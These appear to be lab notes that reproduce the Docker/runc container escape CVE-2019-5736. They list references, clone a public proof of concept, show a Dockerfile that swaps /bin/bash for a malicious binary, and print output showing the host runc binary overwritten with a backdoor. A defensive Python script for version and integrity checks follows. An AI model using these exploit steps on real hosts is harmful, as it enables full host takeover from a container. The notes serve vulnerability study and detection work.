System - Docker - Container Escape - CVE-2019-5736



References:
https://github.com/q3k/cve-2019-5736-poc
https://www.cvedetails.com/cve/CVE-2019-5736/
https://github.com/twistlock/RunC-CVE-2019-5736
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb

Test environment
Ubuntu 18.04 (4.15.0-20-generic)
Affected runc: 1.0.0-rc6
Affected Docker: < 18.09.2

Test steps

# cd
# git clone https://github.com/twistlock/RunC-CVE-2019-5736
# cd RunC-CVE-2019-5736/exec_POC
# vim Dockerfile
    FROM ubuntu:18.04
    COPY replace.sh /
    RUN ["chmod", "+x", "/replace.sh"]
    COPY overwrite_runc /overwrite_runc
    RUN ["chmod", "+x", "/overwrite_runc"]
    COPY new_runc /
    RUN ["mv", "/bin/bash", "/bin/bash_original"]
    COPY bash_evil /bin/bash
    RUN ["chmod", "+x", "/bin/bash"]
    ENTRYPOINT ["/bin/bash_original", "/replace.sh"]

# docker build -t cve .
# docker run --rm --name test cve
    [+] Waiting for runC to be executed in the container...

Open another terminal window

# docker exec test bash
    No help topic for '/bin/bash'

Done

# docker run --rm --name test cve
    [+] Waiting for runC to be executed in the container...
    [+] Got /proc/1071/exe as fd 3 in this process
    [+] Opened runC (using /proc/self/fd/3) for writing
    [+] Succesfully overwritten runC
    [+] Done, shuting down ...

# runc -v

    **THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->
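The `runc -v` output above is the tell-tale sign that the host binary was replaced. A defender-side check for the same lab, added here as an example and not part of the PoC repository or these notes, does two things: it parses a `docker --version` string and flags anything below 18.09.2 (the first Docker release shipping a patched runc, per the environment notes above), and it compares the SHA-256 of the host runc binary against a baseline recorded before the host was exposed. The runc path, the baseline hash variable and the sample version strings are assumptions for illustration; the baseline value itself must come from your own clean install.

```python
"""Added example: version and integrity check for the CVE-2019-5736 lab.
Not from the original notes or the PoC; paths and baseline are placeholders."""
import hashlib
import re
import shutil
import subprocess
from pathlib import Path

# Docker >= 18.09.2 ships a runc build that is not vulnerable (see notes above).
FIXED_DOCKER = (18, 9, 2)

# Assumed host path and a placeholder baseline; record the real hash from a
# clean install (or the package that provides runc) before any container runs.
RUNC_PATH = Path("/usr/bin/runc")
BASELINE_SHA256 = "<sha256 of the clean runc binary>"


def parse_version(text: str) -> tuple:
    """Extract (major, minor, patch) from e.g. 'Docker version 18.09.0, build 4d60db4'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(x) for x in m.groups())


def docker_is_affected(version_text: str) -> bool:
    """True when the Docker version is below the first patched release."""
    return parse_version(version_text) < FIXED_DOCKER


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def binary_matches_baseline(data: bytes, baseline_sha256: str) -> bool:
    """True when the binary contents still hash to the recorded baseline.
    An overwritten runc (as produced by the PoC above) fails this check."""
    return sha256_of_bytes(data) == baseline_sha256.lower()


def runc_binary_modified(runc_path: Path = RUNC_PATH,
                         baseline_sha256: str = BASELINE_SHA256) -> bool:
    return sha256_of_file(runc_path) != baseline_sha256.lower()


if __name__ == "__main__":
    if shutil.which("docker"):
        out = subprocess.run(["docker", "--version"], capture_output=True,
                             text=True, check=False).stdout.strip()
        print(out, "-> AFFECTED" if docker_is_affected(out) else "-> patched")
    if RUNC_PATH.exists() and not BASELINE_SHA256.startswith("<"):
        print("runc binary modified:", runc_binary_modified())
```

On the Debian packages listed in the references, runc is installed by the containerd.io package, so `dpkg --verify containerd.io` gives an independent check of the installed files against the package manifest; re-record the baseline after every upgrade, since a patched runc will also differ from an old hash.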